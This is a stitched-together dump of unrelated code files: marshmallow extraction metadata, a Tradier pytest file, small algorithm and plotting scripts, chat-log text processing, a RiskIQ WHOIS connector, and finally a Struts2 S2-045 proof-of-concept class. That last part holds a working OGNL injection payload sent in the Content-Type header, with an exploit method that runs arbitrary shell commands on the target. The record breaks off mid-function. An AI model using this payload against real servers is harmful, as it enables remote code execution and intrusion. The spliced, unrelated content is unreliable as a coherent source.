"marshmallow.validate.URL",
"marshmallow.validate.Email",
"marshmallow.validate.Regexp",
"marshmallow_enum.EnumField",
"marshmallow.fields.Nested",
"marshmallow.fields.Integer",
"marshmallow.fields.String",
"marshmallow.fields.DateTime",
"marshmallow.fields.Boolean"
] | [((265, 295), 'marshmallow.fields.Integer', 'fields.Integer', ([], {'dump_only': '(True)'}), '(dump_only=True)\n', (279, 295), False, 'from marshmallow import fields, validate\n'), ((409, 439), 'marshmallow.fields.Integer', 'fields.Integer', ([], {'dump_only': '(True)'}), '(dump_only=True)\n', (423, 439), False, 'from marshmallow import fields, validate\n'), ((472, 502), 'marshmallow.fields.Integer', 'fields.Integer', ([], {'dump_only': '(True)'}), '(dump_only=True)\n', (486, 502), False, 'from marshmallow import fields, validate\n'), ((548, 578), 'marshmallow.fields.Integer', 'fields.Integer', ([], {'dump_only': '(True)'}), '(dump_only=True)\n', (562, 578), False, 'from marshmallow import fields, validate\n'), ((591, 619), 'marshmallow.fields.String', 'fields.String', ([], {'required': '(True)'}), '(required=True)\n', (604, 619), False, 'from marshmallow import fields, validate\n'), ((638, 681), 'marshmallow.fields.String', 'fields.String', ([], {'required': '(False)', 'missing': 'None'}), '(required=False, missing=None)\n', (651, 681), False, 'from marshmallow import fields, validate\n'), ((699, 744), 'marshmallow_enum.EnumField', 'EnumField', (['ChallengeDifficulty'], {'required': '(True)'}), '(ChallengeDifficulty, required=True)\n', (708, 744), False, 'from marshmallow_enum import EnumField\n'), ((756, 800), 'marshmallow.fields.String', 'fields.String', ([], {'load_only': '(True)', 'required': '(True)'}), '(load_only=True, required=True)\n', (769, 800), False, 'from marshmallow import fields, validate\n'), ((816, 870), 'marshmallow.fields.Nested', 'fields.Nested', (['ChallengeCategorySchema'], {'dump_only': '(True)'}), '(ChallengeCategorySchema, dump_only=True)\n', (829, 870), False, 'from marshmallow import fields, validate\n'), ((884, 913), 'marshmallow.fields.Integer', 'fields.Integer', ([], {'required': '(True)'}), '(required=True)\n', (898, 913), False, 'from marshmallow import fields, validate\n'), ((931, 962), 'marshmallow.fields.DateTime', 
'fields.DateTime', ([], {'dump_only': '(True)'}), '(dump_only=True)\n', (946, 962), False, 'from marshmallow import fields, validate\n'), ((983, 1012), 'marshmallow.fields.String', 'fields.String', ([], {'dump_only': '(True)'}), '(dump_only=True)\n', (996, 1012), False, 'from marshmallow import fields, validate\n'), ((1120, 1163), 'marshmallow.fields.String', 'fields.String', ([], {'required': '(False)', 'missing': 'None'}), '(required=False, missing=None)\n', (1133, 1163), False, 'from marshmallow import fields, validate\n'), ((1182, 1212), 'marshmallow.fields.Boolean', 'fields.Boolean', ([], {'dump_only': '(True)'}), '(dump_only=True)\n', (1196, 1212), False, 'from marshmallow import fields, validate\n'), ((1265, 1295), 'marshmallow.fields.Integer', 'fields.Integer', ([], {'dump_only': '(True)'}), '(dump_only=True)\n', (1279, 1295), False, 'from marshmallow import fields, validate\n'), ((1415, 1461), 'marshmallow.fields.Nested', 'fields.Nested', (['ChallengeSchema'], {'dump_only': '(True)'}), '(ChallengeSchema, dump_only=True)\n', (1428, 1461), False, 'from marshmallow import fields, validate\n'), ((1475, 1505), 'marshmallow.fields.Integer', 'fields.Integer', ([], {'dump_only': '(True)'}), '(dump_only=True)\n', (1489, 1505), False, 'from marshmallow import fields, validate\n'), ((1524, 1555), 'marshmallow.fields.DateTime', 'fields.DateTime', ([], {'dump_only': '(True)'}), '(dump_only=True)\n', (1539, 1555), False, 'from marshmallow import fields, validate\n'), ((1595, 1625), 'marshmallow.fields.Integer', 'fields.Integer', ([], {'dump_only': '(True)'}), '(dump_only=True)\n', (1609, 1625), False, 'from marshmallow import fields, validate\n'), ((1643, 1674), 'marshmallow.fields.DateTime', 'fields.DateTime', ([], {'dump_only': '(True)'}), '(dump_only=True)\n', (1658, 1674), False, 'from marshmallow import fields, validate\n'), ((1848, 1884), 'marshmallow_enum.EnumField', 'EnumField', (['UserRoles'], {'dump_only': '(True)'}), '(UserRoles, dump_only=True)\n', (1857, 
1884), False, 'from marshmallow_enum import EnumField\n'), ((2032, 2061), 'marshmallow.fields.String', 'fields.String', ([], {'dump_only': '(True)'}), '(dump_only=True)\n', (2045, 2061), False, 'from marshmallow import fields, validate\n'), ((2081, 2111), 'marshmallow.fields.Integer', 'fields.Integer', ([], {'dump_only': '(True)'}), '(dump_only=True)\n', (2095, 2111), False, 'from marshmallow import fields, validate\n'), ((2138, 2168), 'marshmallow.fields.Integer', 'fields.Integer', ([], {'dump_only': '(True)'}), '(dump_only=True)\n', (2152, 2168), False, 'from marshmallow import fields, validate\n'), ((345, 384), 'marshmallow.validate.Regexp', 'validate.Regexp', (['"""^[a-zA-Z0-9_]{3,40}$"""'], {}), "('^[a-zA-Z0-9_]{3,40}$')\n", (360, 384), False, 'from marshmallow import fields, validate\n'), ((1079, 1107), 'marshmallow.validate.URL', 'validate.URL', ([], {'relative': '(False)'}), '(relative=False)\n', (1091, 1107), False, 'from marshmallow import fields, validate\n'), ((1725, 1741), 'marshmallow.validate.Email', 'validate.Email', ([], {}), '()\n', (1739, 1741), False, 'from marshmallow import fields, validate\n'), ((1796, 1835), 'marshmallow.validate.Regexp', 'validate.Regexp', (['"""^[a-zA-Z0-9_]{3,20}$"""'], {}), "('^[a-zA-Z0-9_]{3,20}$')\n", (1811, 1835), False, 'from marshmallow import fields, validate\n'), ((1939, 2018), 'marshmallow.validate.Regexp', 'validate.Regexp', (['"""^(?=.*[a-z])(?=.*[A-Z])(?=.*[0-9])(?=.*[!@#$%^&*_=+-]).{8,}$"""'], {}), "('^(?=.*[a-z])(?=.*[A-Z])(?=.*[0-9])(?=.*[!@#$%^&*_=+-]).{8,}$')\n", (1954, 2018), False, 'from marshmallow import fields, validate\n')] |
import os
import pytest
from tradier_python import TradierAPI
from tradier_python.models import *
@pytest.fixture
def t():
token = os.environ["TRADIER_TOKEN"]
account_id = os.environ["TRADIER_ACCOUNT_ID"]
base_url = os.environ.get("TRADIER_BASE_URL")
return TradierAPI(token=token, default_account_id=account_id, endpoint=base_url)
def test_invalid_request(t: TradierAPI):
pass
def test_get_profile(t: TradierAPI):
profile = t.get_profile()
assert isinstance(profile, Profile)
def test_get_balances(t: TradierAPI):
balances = t.get_balances()
assert isinstance(balances, Balances)
def test_get_positions(t: TradierAPI):
positions = t.get_positions()
assert isinstance(positions, list)
for p in positions:
assert isinstance(p, Position)
def test_get_history(t: TradierAPI):
history = t.get_history()
assert isinstance(history, list)
for e in history:
assert isinstance(e, Event)
def test_get_gainloss(t: TradierAPI):
gainloss = t.get_gain_loss()
assert isinstance(gainloss, list)
for p in gainloss:
assert isinstance(p, ClosedPosition)
def test_get_orders(t: TradierAPI):
orders = t.get_orders()
assert isinstance(orders, list)
for o in orders:
assert isinstance(o, Order)
if len(orders):
id = orders[0].id
o = t.get_order(id)
assert isinstance(o, Order)
| [
"os.environ.get",
"tradier_python.TradierAPI"
] | [((232, 266), 'os.environ.get', 'os.environ.get', (['"""TRADIER_BASE_URL"""'], {}), "('TRADIER_BASE_URL')\n", (246, 266), False, 'import os\n'), ((278, 351), 'tradier_python.TradierAPI', 'TradierAPI', ([], {'token': 'token', 'default_account_id': 'account_id', 'endpoint': 'base_url'}), '(token=token, default_account_id=account_id, endpoint=base_url)\n', (288, 351), False, 'from tradier_python import TradierAPI\n')] |
import unittest
# O(1). Bit manipulation.
class Solution:
def hasAlternatingBits(self, n):
"""
:type n: int
:rtype: bool
"""
prev = n & 1
n >>= 1
while n:
if n & 1 ^ prev:
prev ^= 1
n >>= 1
else:
return False
return True
class Test(unittest.TestCase):
def test(self):
self._test(5, True)
self._test(6, False)
self._test(7, False)
self._test(10, True)
self._test(11, False)
def _test(self, n, expected):
actual = Solution().hasAlternatingBits(n)
self.assertEqual(expected, actual)
if __name__ == '__main__':
unittest.main()
| [
"unittest.main"
] | [((722, 737), 'unittest.main', 'unittest.main', ([], {}), '()\n', (735, 737), False, 'import unittest\n')] |
import matplotlib as mpl
import matplotlib.pyplot as plt
import networkx as nx
import sbadmin.convertGraph as convert
G = nx.generators.directed.random_k_out_graph(10, 3, 0.5)
pos = nx.layout.spring_layout(G)
node_sizes = [3 + 10 * i for i in range(len(G))]
M = G.number_of_edges()
edge_colors = range(2, M + 2)
edge_alphas = [(5 + i) / (M + 4) for i in range(M)]
nodes = nx.draw_networkx_nodes(G, pos, node_size=node_sizes, node_color='blue')
edges = nx.draw_networkx_edges(G, pos, node_size=node_sizes, arrowstyle='->',
arrowsize=10, edge_color=edge_colors,
edge_cmap=plt.cm.Blues, width=2)
# set alpha value for each edge
for i in range(M):
edges[i].set_alpha(edge_alphas[i])
pc = mpl.collections.PatchCollection(edges, cmap=plt.cm.Blues)
pc.set_array(edge_colors)
plt.colorbar(pc)
ax = plt.gca()
ax.set_axis_off()
plt.show()
output = convert.cytoscape_data(G)
print(output)
cy = nx.readwrite.json_graph.cytoscape_data(G)
print(cy) | [
"networkx.layout.spring_layout",
"matplotlib.pyplot.gca",
"sbadmin.convertGraph.cytoscape_data",
"matplotlib.pyplot.colorbar",
"matplotlib.collections.PatchCollection",
"networkx.draw_networkx_nodes",
"networkx.readwrite.json_graph.cytoscape_data",
"networkx.generators.directed.random_k_out_graph",
... | [((123, 176), 'networkx.generators.directed.random_k_out_graph', 'nx.generators.directed.random_k_out_graph', (['(10)', '(3)', '(0.5)'], {}), '(10, 3, 0.5)\n', (164, 176), True, 'import networkx as nx\n'), ((183, 209), 'networkx.layout.spring_layout', 'nx.layout.spring_layout', (['G'], {}), '(G)\n', (206, 209), True, 'import networkx as nx\n'), ((375, 446), 'networkx.draw_networkx_nodes', 'nx.draw_networkx_nodes', (['G', 'pos'], {'node_size': 'node_sizes', 'node_color': '"""blue"""'}), "(G, pos, node_size=node_sizes, node_color='blue')\n", (397, 446), True, 'import networkx as nx\n'), ((455, 599), 'networkx.draw_networkx_edges', 'nx.draw_networkx_edges', (['G', 'pos'], {'node_size': 'node_sizes', 'arrowstyle': '"""->"""', 'arrowsize': '(10)', 'edge_color': 'edge_colors', 'edge_cmap': 'plt.cm.Blues', 'width': '(2)'}), "(G, pos, node_size=node_sizes, arrowstyle='->',\n arrowsize=10, edge_color=edge_colors, edge_cmap=plt.cm.Blues, width=2)\n", (477, 599), True, 'import networkx as nx\n'), ((754, 811), 'matplotlib.collections.PatchCollection', 'mpl.collections.PatchCollection', (['edges'], {'cmap': 'plt.cm.Blues'}), '(edges, cmap=plt.cm.Blues)\n', (785, 811), True, 'import matplotlib as mpl\n'), ((838, 854), 'matplotlib.pyplot.colorbar', 'plt.colorbar', (['pc'], {}), '(pc)\n', (850, 854), True, 'import matplotlib.pyplot as plt\n'), ((861, 870), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (868, 870), True, 'import matplotlib.pyplot as plt\n'), ((889, 899), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (897, 899), True, 'import matplotlib.pyplot as plt\n'), ((910, 935), 'sbadmin.convertGraph.cytoscape_data', 'convert.cytoscape_data', (['G'], {}), '(G)\n', (932, 935), True, 'import sbadmin.convertGraph as convert\n'), ((955, 996), 'networkx.readwrite.json_graph.cytoscape_data', 'nx.readwrite.json_graph.cytoscape_data', (['G'], {}), '(G)\n', (993, 996), True, 'import networkx as nx\n')] |
import os # system()
def can_build(env, platform):
if platform == "x11":
has_pulse = os.system("pkg-config --exists libpulse-simple") == 0
has_alsa = os.system("pkg-config --exists alsa") == 0
return has_pulse or has_alsa
elif platform in ["windows", "osx", "iphone", "android"]:
return True
else:
return False
def configure(env):
pass
def get_doc_classes():
return [
"STTConfig",
"STTQueue",
"STTRunner",
"STTError",
]
def get_doc_path():
return "doc"
| [
"os.system"
] | [((100, 148), 'os.system', 'os.system', (['"""pkg-config --exists libpulse-simple"""'], {}), "('pkg-config --exists libpulse-simple')\n", (109, 148), False, 'import os\n'), ((173, 210), 'os.system', 'os.system', (['"""pkg-config --exists alsa"""'], {}), "('pkg-config --exists alsa')\n", (182, 210), False, 'import os\n')] |
from collections import namedtuple
import torch
import torch.nn as nn
from rlpyt.algos.dqn.dsr.dsr import DSR
from rlpyt.algos.utils import valid_from_done
from rlpyt.utils.tensor import select_at_indexes, valid_mean
OptInfo = namedtuple("OptInfo", ["dsrLoss", "dsrGradNorm", "tdAbsErr"])
class ActionDSR(DSR):
"""Action DSR."""
def __init__(self, **kwargs):
super().__init__(**kwargs)
def dsr_loss(self, samples):
"""Samples have leading batch dimension [B,..] (but not time)."""
# 1a. encode observations in feature space
with torch.no_grad():
features = self.agent.encode(samples.agent_inputs.observation)
features = select_at_indexes(samples.action[:, 0], features)
# 1b. estimate successor features given features
s_features = self.agent(features)
with torch.no_grad():
# 2a. encode target observations in feature space
target_features = self.agent.encode(samples.target_inputs.observation)
next_a = torch.randint(high=target_features.shape[1], size=samples.action[:, 0].shape)
target_features = select_at_indexes(next_a, target_features)
# 2b. estimate target successor features given features
target_s_features = self.agent.target(target_features)
# 3. combine current features + discounted target successor features
disc_target_s_features = (self.discount ** self.n_step_return) * target_s_features
y = features + (1 - samples.done_n.float()).view(-1, 1) * disc_target_s_features
delta = y - s_features
losses = 0.5 * delta ** 2
abs_delta = abs(delta)
if self.delta_clip is not None: # Huber loss.
b = self.delta_clip * (abs_delta - self.delta_clip / 2)
losses = torch.where(abs_delta <= self.delta_clip, losses, b)
# if self.prioritized_replay:
# losses *= samples.is_weights
# sum losses over feature vector such that each sample has a scalar loss (result: B x 1)
# losses = losses.sum(dim=1)
td_abs_errors = abs_delta.detach()
if self.delta_clip is not None:
td_abs_errors = torch.clamp(td_abs_errors, 0, self.delta_clip)
if not self.mid_batch_reset:
valid = valid_from_done(samples.done)
loss = valid_mean(losses, valid)
td_abs_errors *= valid
else:
loss = torch.mean(losses)
return loss, td_abs_errors
| [
"collections.namedtuple",
"torch.mean",
"rlpyt.algos.utils.valid_from_done",
"torch.randint",
"rlpyt.utils.tensor.select_at_indexes",
"rlpyt.utils.tensor.valid_mean",
"torch.no_grad",
"torch.clamp",
"torch.where"
] | [((230, 291), 'collections.namedtuple', 'namedtuple', (['"""OptInfo"""', "['dsrLoss', 'dsrGradNorm', 'tdAbsErr']"], {}), "('OptInfo', ['dsrLoss', 'dsrGradNorm', 'tdAbsErr'])\n", (240, 291), False, 'from collections import namedtuple\n'), ((584, 599), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (597, 599), False, 'import torch\n'), ((699, 748), 'rlpyt.utils.tensor.select_at_indexes', 'select_at_indexes', (['samples.action[:, 0]', 'features'], {}), '(samples.action[:, 0], features)\n', (716, 748), False, 'from rlpyt.utils.tensor import select_at_indexes, valid_mean\n'), ((863, 878), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (876, 878), False, 'import torch\n'), ((1046, 1123), 'torch.randint', 'torch.randint', ([], {'high': 'target_features.shape[1]', 'size': 'samples.action[:, 0].shape'}), '(high=target_features.shape[1], size=samples.action[:, 0].shape)\n', (1059, 1123), False, 'import torch\n'), ((1154, 1196), 'rlpyt.utils.tensor.select_at_indexes', 'select_at_indexes', (['next_a', 'target_features'], {}), '(next_a, target_features)\n', (1171, 1196), False, 'from rlpyt.utils.tensor import select_at_indexes, valid_mean\n'), ((1833, 1885), 'torch.where', 'torch.where', (['(abs_delta <= self.delta_clip)', 'losses', 'b'], {}), '(abs_delta <= self.delta_clip, losses, b)\n', (1844, 1885), False, 'import torch\n'), ((2214, 2260), 'torch.clamp', 'torch.clamp', (['td_abs_errors', '(0)', 'self.delta_clip'], {}), '(td_abs_errors, 0, self.delta_clip)\n', (2225, 2260), False, 'import torch\n'), ((2318, 2347), 'rlpyt.algos.utils.valid_from_done', 'valid_from_done', (['samples.done'], {}), '(samples.done)\n', (2333, 2347), False, 'from rlpyt.algos.utils import valid_from_done\n'), ((2367, 2392), 'rlpyt.utils.tensor.valid_mean', 'valid_mean', (['losses', 'valid'], {}), '(losses, valid)\n', (2377, 2392), False, 'from rlpyt.utils.tensor import select_at_indexes, valid_mean\n'), ((2461, 2479), 'torch.mean', 'torch.mean', (['losses'], {}), '(losses)\n', (2471, 
2479), False, 'import torch\n')] |
from django.contrib.auth import get_user_model
from django.contrib.auth.forms import UserCreationForm
class UserCreationForm(UserCreationForm):
"""A form that creates a user."""
class Meta(UserCreationForm.Meta):
model = get_user_model()
fields = ('username', 'email')
| [
"django.contrib.auth.get_user_model"
] | [((240, 256), 'django.contrib.auth.get_user_model', 'get_user_model', ([], {}), '()\n', (254, 256), False, 'from django.contrib.auth import get_user_model\n')] |
# coding=utf-8
def process_qq_history(path, skip_system=True, encoding="utf-8", strip=None, output_path=None):
"""
Process QQ chat history export text file to sentences.
:param path: Path to QQ history txt file.
:param skip_system: Skip system message if set.
:param encoding: Encoding of the txt file.
:param strip: Chars to be stripped out.
:param output_path: Path to save output.
:return: Processed result path.
"""
import re
# Generate result filename.
if not output_path:
import os
_, filename = os.path.split(path)
result_path = "sentences_in_" + filename
else:
result_path = output_path
# Open files.
with open(path, 'r') as the_file, open(result_path, 'w') as result_file:
# Skip first 7 lines. This will skip until the line before the first system message.
skip = 7
# 0 stands for the empty line before each message.
# 1 stands for the speaker information line.
# 2 stands for the actual message sent.
line_category = 0
# Iterate through the file.
for line in the_file:
# Skip lines.
if skip > 0:
skip -= 1
continue
content = line.decode(encoding=encoding)
if content == u"\r\n":
# Reset line category to 0.
line_category = 0
continue
else:
line_category += 1
# Skip system messages.
if line_category == 1:
if skip_system and "(10000)" in content:
skip += 1
continue
else:
# Strip unnecessary characters.
content = re.sub(r'\[.+\]', '', content).strip(strip)
# Write result if not empty.
if content:
result_file.write(content.encode(encoding=encoding) + "\n")
return result_path
def read_as_set(path, encoding="utf-8", skip=0, skip_prefixes=None, strip=None):
"""
Read a text file and form a set using each line in it.
:param path: Path to the file.
:param encoding: Encoding fo the text.
:param skip: Line count to skip.
:param skip_prefixes: Skip lines with this prefix.
:param strip: Chars to be stripped out.
:return: A set in which is the non-empty lines of the file.
"""
result_set = set()
skips = skip
with open(path, 'r') as the_file:
for line in the_file:
if skips > 0:
skips -= 1
continue
content = line.decode(encoding=encoding).strip(strip)
if not content:
continue
if skip_prefixes:
skip = False
for item in skip_prefixes:
if content.startswith(item.decode(encoding)):
skip = True
if skip:
continue
result_set.add(content)
return result_set
def cut_words_in(path, encoding="utf-8", skip_prefixes=None, strip=None, output_path=None, cleanup=False):
"""
Cut each line in the file into words and stores it in the same directory with a "cut_" prefix in file name.
:param path: Path to the file to cut.
:param encoding: Encoding fo the file.
:param skip_prefixes: Lines start with this prefix will be skipped.
:param strip: Chars to be stripped out.
:param output_path: Path to save output.
:param cleanup: Delete meaningless words, like "这个", if true.
:return: Path to the result file.
"""
if not output_path:
import os
_, filename = os.path.split(path)
result_path = "words_in_" + filename
else:
result_path = output_path
with open(result_path, 'w') as result_file:
for words in CutDocument(path,
cut=False,
skip_prefixes=skip_prefixes,
strip=strip,
cleanup=cleanup,
encoding=encoding):
result_line = " ".join(words)
result_file.write(result_line.encode(encoding=encoding) + "\n")
return result_path
def cut_words(line, cleanup=False):
"""
Cut a sentence in unicode.
:param line: Unicode sentence.
:param cleanup: Delete meaningless words, like "这个", if true.
:return: A list of words.
"""
import jieba
from unicodedata import category
# Delete punctuation words.
content = ''.join(ch for ch in line if category(ch)[0] != 'P')
if cleanup:
import jieba.posseg as pseg
words = []
# POS tagging.
terms = pseg.cut(content)
for term, tag in terms:
if (
tag.startswith(u"c") or tag.startswith(u"e") or
tag.startswith(u"r") or tag.startswith(u"p") or
tag.startswith(u"u") or tag.startswith(u"w") or
tag.startswith(u"y") or tag.startswith(u"v") or
tag.startswith(u"m") or tag.startswith(u"q") or
tag.startswith(u"d")
):
continue
words.append(term)
return words
else:
# Word segmentation.
terms = jieba.cut(content)
return map(unicode, terms)
class CutDocument(object):
"""
Iterate though document, generates a list of cut words per-line.
"""
def __init__(self, document, cut=True, encoding="utf-8",
skip_prefixes=None, strip=None, cleanup=False, min_length=1):
"""
Constructor.
:param document: Path to document that contains one sentences per-line, or a list of sentences.
:param cut: Is the document already cut.
:param encoding: Encoding of the document.
:param skip_prefixes: Lines start with this prefix will be skipped.
:param strip: Chars to be stripped out.
:param cleanup: Delete meaningless words, like "这个", if true.
"""
self.document = document
self.cut = cut
self.encoding = encoding
self.skip_prefixes = skip_prefixes
self.strip = strip
self.cleanup = cleanup
self.min_length = min_length
def __iter__(self):
if isinstance(self.document, list):
the_document = self.document
else:
the_document = open(self.document, 'r')
with the_document:
for line in the_document:
if self.cut:
yield line.decode(encoding=self.encoding).split(" ")
else:
# Decode and strip.
content = line.decode(encoding=self.encoding).strip(self.strip)
# Skip empty lines and lines with skip prefix.
if not content:
continue
if self.skip_prefixes:
skip = False
for item in self.skip_prefixes:
if content.startswith(item.decode(self.encoding)):
skip = True
if skip:
continue
if len(content) < self.min_length:
continue
cut = cut_words(content, cleanup=self.cleanup)
yield cut
| [
"jieba.cut",
"jieba.posseg.cut",
"os.path.split",
"unicodedata.category",
"re.sub"
] | [((572, 591), 'os.path.split', 'os.path.split', (['path'], {}), '(path)\n', (585, 591), False, 'import os\n'), ((3715, 3734), 'os.path.split', 'os.path.split', (['path'], {}), '(path)\n', (3728, 3734), False, 'import os\n'), ((4796, 4813), 'jieba.posseg.cut', 'pseg.cut', (['content'], {}), '(content)\n', (4804, 4813), True, 'import jieba.posseg as pseg\n'), ((5367, 5385), 'jieba.cut', 'jieba.cut', (['content'], {}), '(content)\n', (5376, 5385), False, 'import jieba\n'), ((1771, 1802), 're.sub', 're.sub', (['"""\\\\[.+\\\\]"""', '""""""', 'content'], {}), "('\\\\[.+\\\\]', '', content)\n", (1777, 1802), False, 'import re\n'), ((4661, 4673), 'unicodedata.category', 'category', (['ch'], {}), '(ch)\n', (4669, 4673), False, 'from unicodedata import category\n')] |
""" Copyright start
Copyright (C) 2008 - 2021 Fortinet Inc.
All rights reserved.
FORTINET CONFIDENTIAL & FORTINET PROPRIETARY SOURCE CODE
Copyright end """
import base64
import requests
from connectors.core.connector import ConnectorError, get_logger
logger = get_logger('riskiq-whoisiq')
class RiskIQWHOISIQ(object):
def __init__(self, config):
self.server_url = config.get('server_url')
if not self.server_url.startswith('https://'):
self.server_url = 'https://' + self.server_url
if not self.server_url.endswith('/'):
self.server_url += '/'
self.api_key = config.get('username')
self.api_password = config.get('api_key')
self.verify_ssl = config.get('verify_ssl')
def make_api_call(self, endpoint=None, method='GET', data=None, params=None):
try:
url = self.server_url + endpoint
b64_credential = base64.b64encode((self.api_key + ":" + self.api_password).encode('utf-8')).decode()
headers = {'Authorization': "Basic " + b64_credential, 'Content-Type': 'application/json'}
response = requests.request(method, url, params=params, data=data, headers=headers, verify=self.verify_ssl)
if response.status_code == 200:
return response.json()
else:
logger.error(response.text)
raise ConnectorError({'status_code': response.status_code, 'message': response.reason})
except requests.exceptions.SSLError:
raise ConnectorError('SSL certificate validation failed')
except requests.exceptions.ConnectTimeout:
raise ConnectorError('The request timed out while trying to connect to the server')
except requests.exceptions.ReadTimeout:
raise ConnectorError('The server did not send any data in the allotted amount of time')
except requests.exceptions.ConnectionError:
raise ConnectorError('Invalid endpoint or credentials')
except Exception as err:
logger.exception(str(err))
raise ConnectorError(str(err))
def get_address(config, params):
rw = RiskIQWHOISIQ(config)
endpoint = 'v0/whois/address'
param_dict = {k: v for k, v in params.items() if v is not None and v != '' and v != {} and v != []}
response = rw.make_api_call(endpoint=endpoint, params=param_dict)
return response
def get_domain(config, params):
rw = RiskIQWHOISIQ(config)
endpoint = 'v0/whois/domain'
param_dict = {k: v for k, v in params.items() if v is not None and v != '' and v != {} and v != []}
response = rw.make_api_call(endpoint=endpoint, params=param_dict)
return response
def get_email(config, params):
rw = RiskIQWHOISIQ(config)
endpoint = 'v0/whois/email'
param_dict = {k: v for k, v in params.items() if v is not None and v != '' and v != {} and v != []}
response = rw.make_api_call(endpoint=endpoint, params=param_dict)
return response
def get_name(config, params):
rw = RiskIQWHOISIQ(config)
endpoint = 'v0/whois/name'
param_dict = {k: v for k, v in params.items() if v is not None and v != '' and v != {} and v != []}
response = rw.make_api_call(endpoint=endpoint, params=param_dict)
return response
def get_name_server(config, params):
rw = RiskIQWHOISIQ(config)
endpoint = 'v0/whois/nameserver'
param_dict = {k: v for k, v in params.items() if v is not None and v != '' and v != {} and v != []}
response = rw.make_api_call(endpoint=endpoint, params=param_dict)
return response
def get_org(config, params):
rw = RiskIQWHOISIQ(config)
endpoint = 'v0/whois/org'
param_dict = {k: v for k, v in params.items() if v is not None and v != '' and v != {} and v != []}
response = rw.make_api_call(endpoint=endpoint, params=param_dict)
return response
def get_phone(config, params):
rw = RiskIQWHOISIQ(config)
endpoint = 'v0/whois/phone'
param_dict = {k: v for k, v in params.items() if v is not None and v != '' and v != {} and v != []}
response = rw.make_api_call(endpoint=endpoint, params=param_dict)
return response
def _check_health(config):
try:
rw = RiskIQWHOISIQ(config)
endpoint = 'v0/whois/domain'
params = {'domain': 'google.com'}
response = rw.make_api_call(endpoint=endpoint, params=params)
if response:
logger.info('connector available')
return True
except Exception as err:
logger.exception(str(err))
raise ConnectorError(str(err))
operations = {
'get_address': get_address,
'get_domain': get_domain,
'get_email': get_email,
'get_name': get_name,
'get_name_server': get_name_server,
'get_org': get_org,
'get_phone': get_phone
}
| [
"connectors.core.connector.ConnectorError",
"connectors.core.connector.get_logger",
"requests.request"
] | [((272, 300), 'connectors.core.connector.get_logger', 'get_logger', (['"""riskiq-whoisiq"""'], {}), "('riskiq-whoisiq')\n", (282, 300), False, 'from connectors.core.connector import ConnectorError, get_logger\n'), ((1137, 1237), 'requests.request', 'requests.request', (['method', 'url'], {'params': 'params', 'data': 'data', 'headers': 'headers', 'verify': 'self.verify_ssl'}), '(method, url, params=params, data=data, headers=headers,\n verify=self.verify_ssl)\n', (1153, 1237), False, 'import requests\n'), ((1401, 1487), 'connectors.core.connector.ConnectorError', 'ConnectorError', (["{'status_code': response.status_code, 'message': response.reason}"], {}), "({'status_code': response.status_code, 'message': response.\n reason})\n", (1415, 1487), False, 'from connectors.core.connector import ConnectorError, get_logger\n'), ((1546, 1597), 'connectors.core.connector.ConnectorError', 'ConnectorError', (['"""SSL certificate validation failed"""'], {}), "('SSL certificate validation failed')\n", (1560, 1597), False, 'from connectors.core.connector import ConnectorError, get_logger\n'), ((1667, 1744), 'connectors.core.connector.ConnectorError', 'ConnectorError', (['"""The request timed out while trying to connect to the server"""'], {}), "('The request timed out while trying to connect to the server')\n", (1681, 1744), False, 'from connectors.core.connector import ConnectorError, get_logger\n'), ((1811, 1897), 'connectors.core.connector.ConnectorError', 'ConnectorError', (['"""The server did not send any data in the allotted amount of time"""'], {}), "(\n 'The server did not send any data in the allotted amount of time')\n", (1825, 1897), False, 'from connectors.core.connector import ConnectorError, get_logger\n'), ((1963, 2012), 'connectors.core.connector.ConnectorError', 'ConnectorError', (['"""Invalid endpoint or credentials"""'], {}), "('Invalid endpoint or credentials')\n", (1977, 2012), False, 'from connectors.core.connector import ConnectorError, get_logger\n')] |
import http.client
import urllib
import requests
from scripts.poc.poc_interface import PocInterface
class Structs2_45(PocInterface):
    '''
    Proof-of-concept for the Apache Struts2 S2-045 vulnerability
    (CVE-2017-5638, patched in March 2017). The flaw is triggered by an
    OGNL expression smuggled through the Content-Type header.
    For use only in authorized security testing.
    '''
    def validate(self,url):
        '''
        Check whether the given URL is affected by Struts2 S2-045.
        :param url: URL to probe
        :return: True if vulnerable, False otherwise
        '''
        # The OGNL payload makes the server evaluate 102*102*102*99 and write
        # the product into the response body; seeing that number in the
        # response confirms server-side expression evaluation.
        payload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.println(102*102*102*99)).(#ros.flush())}"
        headers = {}
        headers["Content-Type"] = payload
        r = requests.get(url, headers=headers)
        if "105059592" in r.content:
            return True
        return False
    def exploit(self,url, cmd):
        '''
        Run a command on a host affected by Struts2 S2-045.
        :param url: target URL
        :param cmd: command to execute
        :return: response page content
        '''
        # Same OGNL injection as validate(), but pipes the chosen command
        # through ProcessBuilder and copies its output into the response.
        payload = "%{(#_='multipart/form-data')."
        payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
        payload += "(#_memberAccess?"
        payload += "(#_memberAccess=#dm):"
        payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
        payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
        payload += "(#ognlUtil.getExcludedPackageNames().clear())."
        payload += "(#ognlUtil.getExcludedClasses().clear())."
        payload += "(#context.setMemberAccess(#dm))))."
        payload += "(#cmd='%s')." % cmd
        payload += "(#iswin=(@java.<EMAIL>.System@getProperty('os.name').toLowerCase().contains('win')))."
        payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
        payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
        payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
        payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
        payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
        payload += "(#ros.flush())}"
        try:
